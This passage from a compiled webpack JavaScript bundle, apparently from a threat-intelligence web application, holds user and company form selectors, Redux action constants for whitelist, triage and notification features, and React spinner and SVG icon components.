var roleOptions = Object(__WEBPACK_IMPORTED_MODULE_1_reselect__["createSelector"])(Object(__WEBPACK_IMPORTED_MODULE_10_modules_profile_getters__["hasPermission"])('grant_internal_roles'), __WEBPACK_IMPORTED_MODULE_13_modules_roles_getters__["roles"], function (canAssignAdminRoles, roles) {
  return (canAssignAdminRoles ? roles : roles.filter(function (role) {
    return !role.get('internal');
  })).toList().sort(__WEBPACK_IMPORTED_MODULE_0_trustar_utils__["alphabetize"]).map(function (role) {
    return Object(__WEBPACK_IMPORTED_MODULE_2_immutable__["Map"])(_extends({
      value: role.get('name'),
      label: role.get('displayName')
    }, role.toJS()));
  });
});

// Generate company options for add/edit user form, for Admins to select companies
var companyOptions = Object(__WEBPACK_IMPORTED_MODULE_1_reselect__["createSelector"])(Object(__WEBPACK_IMPORTED_MODULE_10_modules_profile_getters__["hasPermission"])('manage_companies'), __WEBPACK_IMPORTED_MODULE_9_modules_companies_getters__["companies"], function (canManageUsers, companies) {
  return !canManageUsers ? null : companies.toList().sort(__WEBPACK_IMPORTED_MODULE_0_trustar_utils__["alphabetize"]).map(function (company) {
    return Object(__WEBPACK_IMPORTED_MODULE_2_immutable__["Map"])(_extends({
      value: company.get('id'),
      label: company.get('name')
    }, company.update('enclaves', function (e) {
      return e.toList();
    }).toJS()));
  });
});

// Given an enclave, set the access type type based on read/create/update fields
var setAccessType = function setAccessType(enclave) {
  return enclave.set('maximumAccess', Object(__WEBPACK_IMPORTED_MODULE_11_modules_enclave_utils__["c" /* determineAccessType */])(enclave));
};

// Determine initial form values for user add/edit form
var getInitialFormValues = function getInitialFormValues(user) {
  return Object(__WEBPACK_IMPORTED_MODULE_1_reselect__["createSelector"])(Object(__WEBPACK_IMPORTED_MODULE_10_modules_profile_getters__["hasPermission"])('manage_companies'), __WEBPACK_IMPORTED_MODULE_10_modules_profile_getters__["company"], __WEBPACK_IMPORTED_MODULE_13_modules_roles_getters__["roles"], function (canManageCompanies, company, roles) {
    return !user ? Object(__WEBPACK_IMPORTED_MODULE_8__types_js__["b" /* User */])({
      enclaves: canManageCompanies ? Object(__WEBPACK_IMPORTED_MODULE_2_immutable__["List"])() : company.get('enclaves').sort(__WEBPACK_IMPORTED_MODULE_0_trustar_utils__["alphabetize"]).map(setAccessType).toMap().mapKeys(function (k, v) {
        return v.get('id');
      }),
      company: canManageCompanies ? null : company.set('value', company.get('id')).set('label', company.get('name'))
    }) : user.update('enclaves', function (enclaves) {
      return enclaves.sort(__WEBPACK_IMPORTED_MODULE_0_trustar_utils__["alphabetize"]).map(setAccessType);
    }).update('company', function (c) {
      return c.set('value', c.get('id')).set('label', c.get('name'));
    }).update('role', function (r) {
      return r.set('value', r.get('name')).set('label', r.get('displayName'));
    });
  });
};

/***/ }),
/* 780 */,
/* 781 */,
/* 782 */,
/* 783 */,
/* 784 */,
/* 785 */,
/* 786 */,
/* 787 */,
/* 788 */,
/* 789 */,
/* 790 */,
/* 791 */,
/* 792 */,
/* 793 */,
/* 794 */,
/* 795 */,
/* 796 */
/***/ (function(module, __webpack_exports__, __webpack_require__) {

"use strict";
/* harmony export (binding) */ __webpack_require__.d(__webpack_exports__, "q", function() { return UPDATE_PAGE_FILTERS; });
/* harmony export (binding) */ __webpack_require__.d(__webpack_exports__, "j", function() { return RESET_PAGE_FILTERS; });
/* harmony export (binding) */ __webpack_require__.d(__webpack_exports__, "g", function() { return FETCH_WHITELIST_PAGE; });
/* harmony export (binding) */ __webpack_require__.d(__webpack_exports__, "i", function() { return FETCH_WHITELIST_PAGE_SUCCESS; });
/* harmony export (binding) */ __webpack_require__.d(__webpack_exports__, "h", function() { return FETCH_WHITELIST_PAGE_FAILURE; });
/* harmony export (binding) */ __webpack_require__.d(__webpack_exports__, "n", function() { return SAVE_WHITELIST_ENTRY; });
/* harmony export (binding) */ __webpack_require__.d(__webpack_exports__, "p", function() { return SAVE_WHITELIST_ENTRY_SUCCESS; });
/* harmony export (binding) */ __webpack_require__.d(__webpack_exports__, "o", function() { return SAVE_WHITELIST_ENTRY_FAILURE; });
/* harmony export (binding) */ __webpack_require__.d(__webpack_exports__, "k", function() { return SAVE_WHITELIST_ENTRIES; });
/* harmony export (binding) */ __webpack_require__.d(__webpack_exports__, "m", function() { return SAVE_WHITELIST_ENTRIES_SUCCESS; });
/* harmony export (binding) */ __webpack_require__.d(__webpack_exports__, "l", function() { return SAVE_WHITELIST_ENTRIES_FAILURE; });
/* harmony export (binding) */ __webpack_require__.d(__webpack_exports__, "d", function() { return DELETE_WHITELIST_ENTRY; });
/* harmony export (binding) */ __webpack_require__.d(__webpack_exports__, "f", function() { return DELETE_WHITELIST_ENTRY_SUCCESS; });
/* harmony export (binding) */ __webpack_require__.d(__webpack_exports__, "e", function() { return DELETE_WHITELIST_ENTRY_FAILURE; });
/* harmony export (binding) */ __webpack_require__.d(__webpack_exports__, "a", function() { return CLEAR_WHITELIST; });
/* harmony export (binding) */ __webpack_require__.d(__webpack_exports__, "c", function() { return CLEAR_WHITELIST_SUCCESS; });
/* harmony export (binding) */ __webpack_require__.d(__webpack_exports__, "b", function() { return CLEAR_WHITELIST_FAILURE; });
var prefix = function prefix(str) {
  return 'station/global-whitelist/' + str;
};

var UPDATE_PAGE_FILTERS = prefix('UPDATE_PAGE_FILTERS');
var RESET_PAGE_FILTERS = prefix('RESET_PAGE_FILTERS');

var FETCH_WHITELIST_PAGE = prefix('FETCH_WHITELIST_PAGE');
var FETCH_WHITELIST_PAGE_SUCCESS = prefix('FETCH_WHITELIST_PAGE_SUCCESS');
var FETCH_WHITELIST_PAGE_FAILURE = prefix('FETCH_WHITELIST_PAGE_FAILURE');

var SAVE_WHITELIST_ENTRY = prefix('SAVE_WHITELIST_ENTRY');
var SAVE_WHITELIST_ENTRY_SUCCESS = prefix('SAVE_WHITELIST_ENTRY_SUCCESS');
var SAVE_WHITELIST_ENTRY_FAILURE = prefix('SAVE_WHITELIST_ENTRY_FAILURE');

var SAVE_WHITELIST_ENTRIES = prefix('SAVE_WHITELIST_ENTRIES');
var SAVE_WHITELIST_ENTRIES_SUCCESS = prefix('SAVE_WHITELIST_ENTRIES_SUCCESS');
var SAVE_WHITELIST_ENTRIES_FAILURE = prefix('SAVE_WHITELIST_ENTRIES_FAILURE');

var DELETE_WHITELIST_ENTRY = prefix('DELETE_WHITELIST_ENTRY');
var DELETE_WHITELIST_ENTRY_SUCCESS = prefix('DELETE_WHITELIST_ENTRY_SUCCESS');
var DELETE_WHITELIST_ENTRY_FAILURE = prefix('DELETE_WHITELIST_ENTRY_FAILURE');

var CLEAR_WHITELIST = prefix('CLEAR_WHITELIST');
var CLEAR_WHITELIST_SUCCESS = prefix('CLEAR_WHITELIST_SUCCESS');
var CLEAR_WHITELIST_FAILURE = prefix('CLEAR_WHITELIST_FAILURE');

/***/ }),
/* 797 */
/***/ (function(module, __webpack_exports__, __webpack_require__) {

"use strict";
Object.defineProperty(__webpack_exports__, "__esModule", { value: true });
/* harmony export (binding) */ __webpack_require__.d(__webpack_exports__, "globalWhitelistEntries", function() { return globalWhitelistEntries; });
/* harmony export (binding) */ __webpack_require__.d(__webpack_exports__, "loading", function() { return loading; });
/* harmony export (binding) */ __webpack_require__.d(__webpack_exports__, "modalOpen", function() { return modalOpen; });
/* harmony export (binding) */ __webpack_require__.d(__webpack_exports__, "currentQuery", function() { return currentQuery; });
/* harmony export (binding) */ __webpack_require__.d(__webpack_exports__, "defaultPayload", function() { return defaultPayload; });
/* harmony export (binding) */ __webpack_require__.d(__webpack_exports__, "defaultResult", function() { return defaultResult; });
/* harmony import */ var __WEBPACK_IMPORTED_MODULE_0_trustar_utils__ = __webpack_require__(5);
/* harmony import */ var __WEBPACK_IMPORTED_MODULE_1_immutable__ = __webpack_require__(1);
/* harmony import */ var __WEBPACK_IMPORTED_MODULE_2__defaults__ = __webpack_require__(1467);




var globalWhitelistEntries = Object(__WEBPACK_IMPORTED_MODULE_0_trustar_utils__["getterFromKeyPath"])(['globalWhitelist', 'entries']);
var loading = Object(__WEBPACK_IMPORTED_MODULE_0_trustar_utils__["getterFromKeyPath"])(['globalWhitelist', 'loading']);
var modalOpen = Object(__WEBPACK_IMPORTED_MODULE_0_trustar_utils__["getterFromKeyPath"])(['globalWhitelist', 'modalOpen']);
var currentQuery = Object(__WEBPACK_IMPORTED_MODULE_0_trustar_utils__["getterFromKeyPath"])(['globalWhitelist', 'currentQuery']);

var defaultPayload = Object(__WEBPACK_IMPORTED_MODULE_1_immutable__["Map"])({
  query: '',
  sort: Object(__WEBPACK_IMPORTED_MODULE_1_immutable__["Map"])(__WEBPACK_IMPORTED_MODULE_2__defaults__["sorterValues"].searchSorters),
  pageNumber: 0,
  pageSize: 25
});

var defaultResult = Object(__WEBPACK_IMPORTED_MODULE_1_immutable__["Map"])({
  empty: true,
  items: Object(__WEBPACK_IMPORTED_MODULE_1_immutable__["List"])() // PAGE SIZE and stuff? TODO
});

/***/ }),
/* 798 */
/***/ (function(module, __webpack_exports__, __webpack_require__) {

"use strict";
Object.defineProperty(__webpack_exports__, "__esModule", { value: true });
/* harmony export (binding) */ __webpack_require__.d(__webpack_exports__, "Options", function() { return Options; });
/* harmony export (binding) */ __webpack_require__.d(__webpack_exports__, "WhitelistEntry", function() { return WhitelistEntry; });
/* harmony export (binding) */ __webpack_require__.d(__webpack_exports__, "WhitelistPage", function() { return WhitelistPage; });
/* harmony import */ var __WEBPACK_IMPORTED_MODULE_0_immutable__ = __webpack_require__(1);


var Options = Object(__WEBPACK_IMPORTED_MODULE_0_immutable__["Record"])({
  query: '',
  pageNumber: 0,
  pageSize: 25,
  sortBy: 'name',
  sortOrder: 'DESC'
});

var WhitelistEntry = Object(__WEBPACK_IMPORTED_MODULE_0_immutable__["Record"])({
  guid: '',
  pattern: '',
  text: ''
});

// Like payload action but also supports field to update


var WhitelistPage = function WhitelistPage(pageObject) {
  return Object(__WEBPACK_IMPORTED_MODULE_0_immutable__["fromJS"])(pageObject);
};

/***/ }),
/* 799 */
/***/ (function(module, __webpack_exports__, __webpack_require__) {

"use strict";
/* harmony export (binding) */ __webpack_require__.d(__webpack_exports__, "a", function() { return FETCH_TRIAGE_REPORTS; });
/* harmony export (binding) */ __webpack_require__.d(__webpack_exports__, "b", function() { return FETCH_TRIAGE_REPORTS_AND_ENRICH; });
/* harmony export (binding) */ __webpack_require__.d(__webpack_exports__, "d", function() { return FETCH_TRIAGE_REPORTS_SUCCESS; });
/* harmony export (binding) */ __webpack_require__.d(__webpack_exports__, "c", function() { return FETCH_TRIAGE_REPORTS_FAILURE; });
/* harmony export (binding) */ __webpack_require__.d(__webpack_exports__, "f", function() { return SET_TRIAGE_STATUS_FOR_REPORT; });
/* harmony export (binding) */ __webpack_require__.d(__webpack_exports__, "h", function() { return SET_TRIAGE_STATUS_FOR_REPORT_SUCCESS; });
/* harmony export (binding) */ __webpack_require__.d(__webpack_exports__, "g", function() { return SET_TRIAGE_STATUS_FOR_REPORT_FAILURE; });
/* harmony export (binding) */ __webpack_require__.d(__webpack_exports__, "e", function() { return RESET_PAGE; });
var prefix = function prefix(str) {
  return 'station/triage/' + str;
};

var FETCH_TRIAGE_REPORTS = prefix('FETCH_TRIAGE_REPORTS');
var FETCH_TRIAGE_REPORTS_AND_ENRICH = prefix('FETCH_TRIAGE_REPORTS_AND_ENRICH');
var FETCH_TRIAGE_REPORTS_SUCCESS = prefix('FETCH_TRIAGE_REPORTS_SUCCESS');
var FETCH_TRIAGE_REPORTS_FAILURE = prefix('FETCH_TRIAGE_REPORTS_FAILURE');

var SET_TRIAGE_STATUS_FOR_REPORT = prefix('SET_TRIAGE_STATUS_FOR_REPORT');
var SET_TRIAGE_STATUS_FOR_REPORT_SUCCESS = prefix('SET_TRIAGE_STATUS_FOR_REPORT_SUCCESS');
var SET_TRIAGE_STATUS_FOR_REPORT_FAILURE = prefix('SET_TRIAGE_STATUS_FOR_REPORT_FAILURE');

var RESET_PAGE = prefix('RESET_PAGE');

/***/ }),
/* 800 */
/***/ (function(module, __webpack_exports__, __webpack_require__) {

"use strict";
/* harmony export (binding) */ __webpack_require__.d(__webpack_exports__, "g", function() { return FETCH_PREFERENCES; });
/* harmony export (binding) */ __webpack_require__.d(__webpack_exports__, "i", function() { return FETCH_PREFERENCES_SUCCESS; });
/* harmony export (binding) */ __webpack_require__.d(__webpack_exports__, "h", function() { return FETCH_PREFERENCES_FAILURE; });
/* harmony export (binding) */ __webpack_require__.d(__webpack_exports__, "m", function() { return UPDATE_PREFERENCES; });
/* harmony export (binding) */ __webpack_require__.d(__webpack_exports__, "o", function() { return UPDATE_PREFERENCES_SUCCESS; });
/* harmony export (binding) */ __webpack_require__.d(__webpack_exports__, "n", function() { return UPDATE_PREFERENCES_FAILURE; });
/* harmony export (binding) */ __webpack_require__.d(__webpack_exports__, "j", function() { return FETCH_WATCHED_KEYWORDS; });
/* harmony export (binding) */ __webpack_require__.d(__webpack_exports__, "l", function() { return FETCH_WATCHED_KEYWORDS_SUCCESS; });
/* harmony export (binding) */ __webpack_require__.d(__webpack_exports__, "k", function() { return FETCH_WATCHED_KEYWORDS_FAILURE; });
/* harmony export (binding) */ __webpack_require__.d(__webpack_exports__, "a", function() { return ADD_WATCHED_KEYWORD; });
/* harmony export (binding) */ __webpack_require__.d(__webpack_exports__, "c", function() { return ADD_WATCHED_KEYWORD_SUCCESS; });
/* harmony export (binding) */ __webpack_require__.d(__webpack_exports__, "b", function() { return ADD_WATCHED_KEYWORD_FAILURE; });
/* harmony export (binding) */ __webpack_require__.d(__webpack_exports__, "d", function() { return DELETE_WATCHED_KEYWORD; });
/* harmony export (binding) */ __webpack_require__.d(__webpack_exports__, "f", function() { return DELETE_WATCHED_KEYWORD_SUCCESS; });
/* harmony export (binding) */ __webpack_require__.d(__webpack_exports__, "e", function() { return DELETE_WATCHED_KEYWORD_FAILURE; });
var prefix = function prefix(str) {
  return 'station/notificationPreferences/' + str;
};

var FETCH_PREFERENCES = prefix('FETCH_PREFERENCES');
var FETCH_PREFERENCES_SUCCESS = prefix('FETCH_PREFERENCES_SUCCESS');
var FETCH_PREFERENCES_FAILURE = prefix('FETCH_PREFERENCES_FAILURE');

var UPDATE_PREFERENCES = prefix('UPDATE_PREFERENCES');
var UPDATE_PREFERENCES_SUCCESS = prefix('UPDATE_PREFERENCES_SUCCESS');
var UPDATE_PREFERENCES_FAILURE = prefix('UPDATE_PREFERENCES_FAILURE');

var FETCH_WATCHED_KEYWORDS = prefix('FETCH_WATCHED_KEYWORDS');
var FETCH_WATCHED_KEYWORDS_SUCCESS = prefix('FETCH_WATCHED_KEYWORDS_SUCCESS');
var FETCH_WATCHED_KEYWORDS_FAILURE = prefix('FETCH_WATCHED_KEYWORDS_FAILURE');

var ADD_WATCHED_KEYWORD = prefix('ADD_WATCHED_KEYWORD');
var ADD_WATCHED_KEYWORD_SUCCESS = prefix('ADD_WATCHED_KEYWORD_SUCCESS');
var ADD_WATCHED_KEYWORD_FAILURE = prefix('ADD_WATCHED_KEYWORD_FAILURE');

var DELETE_WATCHED_KEYWORD = prefix('DELETE_WATCHED_KEYWORD');
var DELETE_WATCHED_KEYWORD_SUCCESS = prefix('DELETE_WATCHED_KEYWORD_SUCCESS');
var DELETE_WATCHED_KEYWORD_FAILURE = prefix('DELETE_WATCHED_KEYWORD_FAILURE');

/***/ }),
/* 801 */
/***/ (function(module, __webpack_exports__, __webpack_require__) {

"use strict";
Object.defineProperty(__webpack_exports__, "__esModule", { value: true });
/* harmony export (binding) */ __webpack_require__.d(__webpack_exports__, "NotificationPreferences", function() { return NotificationPreferences; });
/* harmony export (binding) */ __webpack_require__.d(__webpack_exports__, "toNotificationPreferences", function() { return toNotificationPreferences; });
/* harmony export (binding) */ __webpack_require__.d(__webpack_exports__, "WatchedKeyword", function() { return WatchedKeyword; });
/* harmony export (binding) */ __webpack_require__.d(__webpack_exports__, "WatchedKeywords", function() { return WatchedKeywords; });
/* harmony export (binding) */ __webpack_require__.d(__webpack_exports__, "toWatchedKeywords", function() { return toWatchedKeywords; });
/* harmony import */ var __WEBPACK_IMPORTED_MODULE_0_immutable__ = __webpack_require__(1);
/* harmony import */ var __WEBPACK_IMPORTED_MODULE_1_trustar_utils__ = __webpack_require__(5);



var NotificationPreferences = Object(__WEBPACK_IMPORTED_MODULE_0_immutable__["Record"])({
  activity: Object(__WEBPACK_IMPORTED_MODULE_0_immutable__["Map"])({
    global: Object(__WEBPACK_IMPORTED_MODULE_0_immutable__["Map"])({ emailEnabled: true }),
    newReport: Object(__WEBPACK_IMPORTED_MODULE_0_immutable__["Map"])({ emailEnabled: true }),
    watchedKeyword: Object(__WEBPACK_IMPORTED_MODULE_0_immutable__["Map"])({ emailEnabled: true })
  }),
  activitySummary: Object(__WEBPACK_IMPORTED_MODULE_0_immutable__["Map"])({
    dailyEnabled: true,
    weeklyEnabled: true
  })
});

var toNotificationPreferences = function toNotificationPreferences(k, v) {
  if (k === '') {
    return NotificationPreferences(v);
  } else if (Object(__WEBPACK_IMPORTED_MODULE_1_trustar_utils__["isMapLike"])(v)) {
    return Object(__WEBPACK_IMPORTED_MODULE_0_immutable__["Map"])(v);
  } else if (Object(__WEBPACK_IMPORTED_MODULE_1_trustar_utils__["isListLike"])(v)) {
    return Object(__WEBPACK_IMPORTED_MODULE_0_immutable__["List"])(v);
  } else {
    return v;
  }
};

var WatchedKeyword = Object(__WEBPACK_IMPORTED_MODULE_0_immutable__["Record"])({
  guid: '',
  keyword: ''
});
var WatchedKeywords = Object(__WEBPACK_IMPORTED_MODULE_0_immutable__["List"])();

var toWatchedKeywords = function toWatchedKeywords(k, v) {
  if (k === '') {
    return Object(__WEBPACK_IMPORTED_MODULE_0_immutable__["List"])(v);
  } else if (Object(__WEBPACK_IMPORTED_MODULE_1_trustar_utils__["isMapLike"])(v)) {
    return Object(__WEBPACK_IMPORTED_MODULE_0_immutable__["Map"])(v);
  } else if (Object(__WEBPACK_IMPORTED_MODULE_1_trustar_utils__["isListLike"])(v)) {
    return Object(__WEBPACK_IMPORTED_MODULE_0_immutable__["List"])(v);
  } else {
    return v;
  }
};

/***/ }),
/* 802 */
/***/ (function(module, __webpack_exports__, __webpack_require__) {

"use strict";
/* harmony export (binding) */ __webpack_require__.d(__webpack_exports__, "b", function() { return Spinner; });
/* harmony export (binding) */ __webpack_require__.d(__webpack_exports__, "a", function() { return Pulse; });
/* unused harmony export Circle */
/* harmony import */ var __WEBPACK_IMPORTED_MODULE_0_react__ = __webpack_require__(0);
/* harmony import */ var __WEBPACK_IMPORTED_MODULE_0_react___default = __webpack_require__.n(__WEBPACK_IMPORTED_MODULE_0_react__);
/* harmony import */ var __WEBPACK_IMPORTED_MODULE_1_react_spinkit__ = __webpack_require__(1474);
/* harmony import */ var __WEBPACK_IMPORTED_MODULE_1_react_spinkit___default = __webpack_require__.n(__WEBPACK_IMPORTED_MODULE_1_react_spinkit__);
/* harmony import */ var __WEBPACK_IMPORTED_MODULE_2_classnames_bind__ = __webpack_require__(39);
/* harmony import */ var __WEBPACK_IMPORTED_MODULE_2_classnames_bind___default = __webpack_require__.n(__WEBPACK_IMPORTED_MODULE_2_classnames_bind__);
/* harmony import */ var __WEBPACK_IMPORTED_MODULE_3__Spinner_styl__ = __webpack_require__(3473);
/* harmony import */ var __WEBPACK_IMPORTED_MODULE_3__Spinner_styl___default = __webpack_require__.n(__WEBPACK_IMPORTED_MODULE_3__Spinner_styl__);
var _extends = Object.assign || function (target) { for (var i = 1; i < arguments.length; i++) { var source = arguments[i]; for (var key in source) { if (Object.prototype.hasOwnProperty.call(source, key)) { target[key] = source[key]; } } } return target; };

function _objectWithoutProperties(obj, keys) { var target = {}; for (var i in obj) { if (keys.indexOf(i) >= 0) continue; if (!Object.prototype.hasOwnProperty.call(obj, i)) continue; target[i] = obj[i]; } return target; }






var cx = __WEBPACK_IMPORTED_MODULE_2_classnames_bind___default.a.bind(__WEBPACK_IMPORTED_MODULE_3__Spinner_styl___default.a);

var Spinner = function Spinner(props) {
  var className = props.className,
      childProps = _objectWithoutProperties(props, ['className']);

  return __WEBPACK_IMPORTED_MODULE_0_react___default.a.createElement(
    'div',
    _extends({ 'data-cy': 'spinner', className: cx(className, 'Spinner') }, childProps),
    __WEBPACK_IMPORTED_MODULE_0_react___default.a.createElement(__WEBPACK_IMPORTED_MODULE_1_react_spinkit___default.a, { name: 'three-bounce', fadeIn: 'none' })
  );
};


var Pulse = function Pulse(props) {
  return __WEBPACK_IMPORTED_MODULE_0_react___default.a.createElement(
    'div',
    props,
    __WEBPACK_IMPORTED_MODULE_0_react___default.a.createElement(__WEBPACK_IMPORTED_MODULE_1_react_spinkit___default.a, { name: 'pulse', fadeIn: 'none' })
  );
};

var Circle = function Circle(props) {
  var className = props.className,
      childProps = _objectWithoutProperties(props, ['className']);

  return __WEBPACK_IMPORTED_MODULE_0_react___default.a.createElement(
    'span',
    _extends({ className: cx(className, 'Circle') }, childProps),
    __WEBPACK_IMPORTED_MODULE_0_react___default.a.createElement('span', { className: __WEBPACK_IMPORTED_MODULE_3__Spinner_styl___default.a.inner })
  );
};


/***/ }),
/* 803 */
/***/ (function(module, __webpack_exports__, __webpack_require__) {

"use strict";
/* unused harmony export ExploreIcon */
/* unused harmony export DashboardIcon */
/* harmony export (binding) */ __webpack_require__.d(__webpack_exports__, "h", function() { return TrustarAdminIcon; });
/* unused harmony export SaveIcon */
/* unused harmony export ExportIcon */
/* unused harmony export RefreshIcon */
/* harmony export (binding) */ __webpack_require__.d(__webpack_exports__, "e", function() { return NextIcon; });
/* harmony export (binding) */ __webpack_require__.d(__webpack_exports__, "g", function() { return PrevIcon; });
/* unused harmony export SearchIcon */
/* unused harmony export FilterIcon */
/* unused harmony export CalendarIcon */
/* unused harmony export FloppyIcon */
/* unused harmony export DownloadIcon */
/* unused harmony export CogIcon */
/* unused harmony export RedoIcon */
/* unused harmony export UndoIcon */
/* harmony export (binding) */ __webpack_require__.d(__webpack_exports__, "c", function() { return InboxDownloadIcon; });
/* harmony export (binding) */ __webpack_require__.d(__webpack_exports__, "a", function() { return CheckMark; });
/* unused harmony export PencilIcon */
/* unused harmony export TrashIcon */
/* harmony export (binding) */ __webpack_require__.d(__webpack_exports__, "f", function() { return PlusIcon; });
/* harmony export (binding) */ __webpack_require__.d(__webpack_exports__, "b", function() { return CloseIcon; });
/* harmony export (binding) */ __webpack_require__.d(__webpack_exports__, "d", function() { return MinusIcon; });
/* unused harmony export ImportIcon */
/* harmony import */ var __WEBPACK_IMPORTED_MODULE_0_react__ = __webpack_require__(0);
/* harmony import */ var __WEBPACK_IMPORTED_MODULE_0_react___default = __webpack_require__.n(__WEBPACK_IMPORTED_MODULE_0_react__);
/* harmony import */ var __WEBPACK_IMPORTED_MODULE_1_classnames_bind__ = __webpack_require__(39);
/* harmony import */ var __WEBPACK_IMPORTED_MODULE_1_classnames_bind___default = __webpack_require__.n(__WEBPACK_IMPORTED_MODULE_1_classnames_bind__);
/* harmony import */ var __WEBPACK_IMPORTED_MODULE_2_trustar_img_reload_svg__ = __webpack_require__(1651);
/* harmony import */ var __WEBPACK_IMPORTED_MODULE_2_trustar_img_reload_svg___default = __webpack_require__.n(__WEBPACK_IMPORTED_MODULE_2_trustar_img_reload_svg__);
/* harmony import */ var __WEBPACK_IMPORTED_MODULE_3_trustar_img_next_svg__ = __webpack_require__(1652);
/* harmony import */ var __WEBPACK_IMPORTED_MODULE_3_trustar_img_next_svg___default = __webpack_require__.n(__WEBPACK_IMPORTED_MODULE_3_trustar_img_next_svg__);
/* harmony import */ var __WEBPACK_IMPORTED_MODULE_4_trustar_img_prev_svg__ = __webpack_require__(1653);
/* harmony import */ var __WEBPACK_IMPORTED_MODULE_4_trustar_img_prev_svg___default = __webpack_require__.n(__WEBPACK_IMPORTED_MODULE_4_trustar_img_prev_svg__);
/* harmony import */ var __WEBPACK_IMPORTED_MODULE_5_trustar_img_funnel_svg__ = __webpack_require__(1654);
/* harmony import */ var __WEBPACK_IMPORTED_MODULE_5_trustar_img_funnel_svg___default = __webpack_require__.n(__WEBPACK_IMPORTED_MODULE_5_trustar_img_funnel_svg__);
/* harmony import */ var __WEBPACK_IMPORTED_MODULE_6_trustar_img_magnifier_svg__ = __webpack_require__(1655);
/* harmony import */ var __WEBPACK_IMPORTED_MODULE_6_trustar_img_magnifier_svg___default = __webpack_require__.n(__WEBPACK_IMPORTED_MODULE_6_trustar_img_magnifier_svg__);
/* harmony import */ var __WEBPACK_IMPORTED_MODULE_7_trustar_img_calendar_full_svg__ = __webpack_require__(1656);
/* harmony import */ var __WEBPACK_IMPORTED_MODULE_7_trustar_img_calendar_full_svg___default = __webpack_require__.n(__WEBPACK_IMPORTED_MODULE_7_trustar_img_calendar_full_svg__);
/* harmony import */ var __WEBPACK_IMPORTED_MODULE_8_trustar_img_download_svg__ = __webpack_require__(1657);
/* harmony import */ var __WEBPACK_IMPORTED_MODULE_8_trustar_img_download_svg___default = __webpack_require__.n(__WEBPACK_IMPORTED_MODULE_8_trustar_img_download_svg__);
/* harmony import */ var __WEBPACK_IMPORTED_MODULE_9_trustar_img_floppy_disk_svg__ = __webpack_require__(1658);
/* harmony import */ var __WEBPACK_IMPORTED_MODULE_9_trustar_img_floppy_disk_svg___default = __webpack_require__.n(__WEBPACK_IMPORTED_MODULE_9_trustar_img_floppy_disk_svg__);
/* harmony import */ var __WEBPACK_IMPORTED_MODULE_10_trustar_img_cog_svg__ = __webpack_require__(1659);
/* harmony import */ var __WEBPACK_IMPORTED_MODULE_10_trustar_img_cog_svg___default = __webpack_require__.n(__WEBPACK_IMPORTED_MODULE_10_trustar_img_cog_svg__);
/* harmony import */ var __WEBPACK_IMPORTED_MODULE_11_trustar_img_redo_svg__ = __webpack_require__(1660);
/* harmony import */ var __WEBPACK_IMPORTED_MODULE_11_trustar_img_redo_svg___default = __webpack_require__.n(__WEBPACK_IMPORTED_MODULE_11_trustar_img_redo_svg__);
/* harmony import */ var __WEBPACK_IMPORTED_MODULE_12_trustar_img_undo_svg__ = __webpack_require__(1661);
/* harmony import */ var __WEBPACK_IMPORTED_MODULE_12_trustar_img_undo_svg___default = __webpack_require__.n(__WEBPACK_IMPORTED_MODULE_12_trustar_img_undo_svg__);
/* harmony import */ var __WEBPACK_IMPORTED_MODULE_13__admean_png__ = __webpack_require__(3478);
/* harmony import */ var __WEBPACK_IMPORTED_MODULE_13__admean_png___default = __webpack_require__.n(__WEBPACK_IMPORTED_MODULE_13__admean_png__);
/* harmony import */ var __WEBPACK_IMPORTED_MODULE_14__Icons_styl__ = __webpack_require__(3479);
/* harmony import */ var __WEBPACK_IMPORTED_MODULE_14__Icons_styl___default = __webpack_require__.n(__WEBPACK_IMPORTED_MODULE_14__Icons_styl__);
var _extends = Object.assign || function (target) { for (var i = 1; i < arguments.length; i++) { var source = arguments[i]; for (var key in source) { if (Object.prototype.hasOwnProperty.call(source, key)) { target[key] = source[key]; } } } return target; };

function _objectWithoutProperties(obj, keys) { var target = {}; for (var i in obj) { if (keys.indexOf(i) >= 0) continue; if (!Object.prototype.hasOwnProperty.call(obj, i)) continue; target[i] = obj[i]; } return target; }


















var cx = __WEBPACK_IMPORTED_MODULE_1_classnames_bind___default.a.bind(__WEBPACK_IMPORTED_MODULE_14__Icons_styl___default.a);

/**
 * NOTE: svg markup was originally exported from Sketch but has since been
 * modified here
 */
var ExploreIcon = function ExploreIcon(_ref) {
  var _ref$color = _ref.color,
      color = _ref$color === undefined ? '#FFFFFF' : _ref$color,
      props = _objectWithoutProperties(_ref, ['color']);

  return __WEBPACK_IMPORTED_MODULE_0_react__["createElement"](
    'svg',
    _extends({
      width: '24px',
      height: '24px',
      viewBox: '0 0 24 24',
      version: '1.1',
      xmlns: 'http://www.w3.org/2000/svg',
      xmlnsXlink: 'http://www.w3.org/1999/xlink'
    }, props),
    __WEBPACK_IMPORTED_MODULE_0_react__["createElement"](
      'g',
      {
        stroke: 'none',
        strokeWidth: '1',
        fill: 'none',
        fillRule: 'evenodd',
        transform: 'translate(-328.000000, -25.000000)' },
      __WEBPACK_IMPORTED_MODULE_0_react__["createElement"]('path', {
        d: 'M342.755,38.043 L341.932,36.749 L342.755,35.456 L348.706,36.749 L342.755,38.043 Z M341.021,44.47 L341.923,40.315 L343.893,41.568 C343.974,41.62 344.065,41.646 344.156,41.646 C344.282,41.646 344.408,41.597 344.502,41.502 C344.664,41.34 344.692,41.086 344.569,40.893 L343.316,38.924 L347.469,38.021 C346.927,41.301 344.3,43.927 341.021,44.47 Z M339.75,45.705 L338.456,39.755 L339.75,38.932 L341.043,39.755 L339.75,45.705 Z M332.029,38.021 L336.184,38.924 L334.93,40.893 C334.807,41.086 334.835,41.34 334.997,41.502 C335.16,41.664 335.414,41.69 335.607,41.568 L337.576,40.315 L338.479,44.47 C335.198,43.927 332.572,41.301 332.029,38.021 Z M330.794,36.749 L336.744,35.456 L337.567,36.749 L336.744,38.043 L330.794,36.749 Z M338.479,29.029 L337.576,33.184 L335.607,31.93 C335.414,31.808 335.16,31.834 334.997,31.997 C334.835,32.159 334.807,32.412 334.93,32.606 L336.184,34.575 L332.029,35.479 C332.572,32.198 335.198,29.572 338.479,29.029 Z M339.75,27.793 L341.043,33.744 L339.75,34.566 L338.456,33.744 L339.75,27.793 Z M340.939,37.013 L342.56,39.56 L340.013,37.939 C339.932,37.887 339.841,37.862 339.75,37.862 C339.658,37.862 339.567,37.887 339.486,37.939 L336.939,39.56 L338.561,37.013 C338.662,36.852 338.662,36.647 338.561,36.486 L336.939,33.939 L339.486,35.561 C339.647,35.663 339.852,35.663 340.013,35.561 L342.56,33.939 L340.939,36.486 C340.837,36.647 340.837,36.852 340.939,37.013 